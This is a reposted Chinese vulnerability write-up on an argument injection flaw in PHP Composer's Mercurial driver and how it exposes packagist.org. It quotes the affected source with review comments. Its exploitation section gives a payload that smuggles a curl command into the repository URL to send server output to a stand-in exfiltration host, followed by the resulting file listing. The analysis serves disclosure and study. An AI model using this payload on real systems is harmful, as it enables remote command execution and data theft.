转自:SecTr安全团队
概述
技术细节
use SymfonyComponentProcessProcess;
// [...]
class ProcessExecutor
{
// [...]
/**
 * Runs $command through doExecute(), optionally capturing its output.
 *
 * The forwarding is split on func_num_args() rather than on a null test so
 * that doExecute() only receives the $output reference when the caller
 * actually supplied an argument for it (see doExecute(), where $output may
 * also be a callable used as the run callback).
 *
 * @param string      $command shell command line to run
 * @param mixed       $output  by-reference; receives the output (or is a callable)
 * @param string|null $cwd     working directory, or null for the current one
 * @return int exit code as returned by doExecute() (callers compare it with 0)
 */
public function execute($command, &$output = null, $cwd = null)
{
    $outputWasGiven = func_num_args() > 1;

    return $outputWasGiven
        ? $this->doExecute($command, $cwd, false, $output)
        : $this->doExecute($command, $cwd, false);
}
// [...]
private function doExecute($command, $cwd, $tty, &$output = null)
{
// [...]
if (method_exists('SymfonyComponentProcessProcess', 'fromShellCommandline')) {
// [1]
$process = Process::fromShellCommandline($command, $cwd, null, null, static::getTimeout());
} else {
// [2]
$process = new Process($command, $cwd, null, null, static::getTimeout());
}
if (!Platform::isWindows() && $tty) {
try {
$process->setTty(true);
} catch (RuntimeException $e) {
// ignore TTY enabling errors
}
}
$callback = is_callable($output) ? $output : array($this, 'outputHandler');
$process->run($callback);
public static function supports(IOInterface $io, Config $config, $url, $deep = false)
{
if (preg_match('#(^git://|.git/?$|git(?:olite)?@|//git.|//github.com/)#i', $url)) {
return true;
}
// [...]
try {
$gitUtil->runCommand(function ($url) {
return 'git ls-remote --heads ' . ProcessExecutor::escape($url); // [1]
}, $url, sys_get_temp_dir());
} catch (RuntimeException $e) {
return false;
}
composer/src/Composer/Repository/Vcs/SvnDriver.php
public static function supports(IOInterface $io, Config $config, $url, $deep = false)
{
$url = self::normalizeUrl($url);
if (preg_match('#(^svn://|^svn+ssh://|svn.)#i', $url)) {
return true;
}
// [...]
$process = new ProcessExecutor($io);
$exit = $process->execute(
"svn info --non-interactive ".ProcessExecutor::escape($url),
$ignoredOutput
);
composer/src/Composer/Repository/Vcs/HgDriver.php
/**
 * Decides whether this driver can handle $url.
 *
 * URLs matching known Mercurial hosts are accepted on the pattern alone;
 * anything else is probed by running `hg identify` against the URL and
 * treating a zero exit code as "supported".
 *
 * @param string $url
 * @param bool   $deep  not used in the visible part of the method; the elided
 *                      section may read it
 * @return bool
 */
public static function supports(IOInterface $io, Config $config, $url, $deep = false)
{
    // The host dots are unescaped and the pattern is not anchored at the end,
    // so this early-accept path matches more than the literal host names.
    if (preg_match('#(^(?:https?|ssh)://(?:[^@]+@)?bitbucket.org|https://(?:.*?).kilnhg.com)#i', $url)) {
        return true;
    }
    // [...]
    $process = new ProcessExecutor($io);
    // NOTE(review): escape() only quotes $url as a single shell argument; it
    // does not reject a value that starts with '-'. hg parses such a quoted
    // value as an option, so the quoting alone does not prevent argument
    // injection (the exploitation section below demonstrates this). A scheme
    // check on $url, or passing it after `--`, is needed in addition.
    $exit = $process->execute(sprintf('hg identify %s', ProcessExecutor::escape($url)), $ignored);
    return $exit === 0;
}
packagist.org入侵
Packagist.org 在创建软件包的过程中依靠 Composer 的 API 来获取软件包信息,因此同样支持各种 VCS,例如 Git、Subversion、Mercurial 等。如 packagist/src/Entity/Package.php 所示,它会执行以下操作:
packagist/src/Entity/Package.php
$io = new NullIO();
$config = Factory::createConfig();
$io->loadConfiguration($config);
$httpDownloader = new HttpDownloader($io, $config);
$repository = new VcsRepository(['url' => $this->repository], $io, $config, $httpDownloader); // [1]
$driver = $this->vcsDriver = $repository->getDriver(); // [2]
if (!$driver) {
return;
}
$information = $driver->getComposerInformation($driver->getRootIdentifier());
if (!isset($information['name'])) {
return;
}
if (null === $this->getName()) {
$this->setName(trim($information['name']));
}
注释[1]处的 VcsRepository 类来自 Composer,注释[2]处调用的 getDriver() 方法会依次触发以下各 VCS 驱动的 supports() 和 initialize() 方法:
- GitHubDriver
- GitLabDriver
- GitBitbucketDriver
- GitDriver
- HgBitbucketDriver
- HgDriver
- PerforceDriver
- FossilDriver
- SvnDriver
漏洞利用
-config=alias.identify=!curl http://exfiltration-host.tld --data “$(ls -alh)”
total 120K
drwxrwxr-x 9 composer composer 4.0K Apr 21 23:19 .
dr-xr-xr-x 15 composer composer 4.0K Apr 20 07:38 ..
-r--r--r-- 1 composer composer 8.7K Apr 20 07:38 .htaccess
-r--r--r-- 1 composer composer 1.3K Apr 20 07:38 app.php
-r--r--r-- 1 composer composer 8.2K Apr 20 07:38 apple-touch-icon-precomposed.png
-r--r--r-- 1 composer composer 8.2K Apr 20 07:38 apple-touch-icon.png
dr-xr-xr-x 3 composer composer 4.0K Jan 13 14:35 bundles
dr-xr-xr-x 4 composer composer 4.0K Apr 20 07:38 css [...]
lrwxrwxrwx 1 composer composer 15 Aug 13 2020 packages.json -> p/packages.json
lrwxrwxrwx 1 composer composer 18 Aug 13 2020 packages.json.gz -> p/packages.json.gz
-r--r--r-- 1 composer composer 106 Apr 20 07:38 robots.txt
-r--r--r-- 1 composer composer 798 Apr 20 07:38 search.osd
dr-xr-xr-x 2 composer composer 4.0K Apr 20 07:38 static-error
-r--r--r-- 1 composer composer 8.8K Apr 20 07:38 touch-icon-192x192.png
原文始发于微信公众号(橘猫学安全):PHP Composer命令注入漏洞详情及利用方式
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。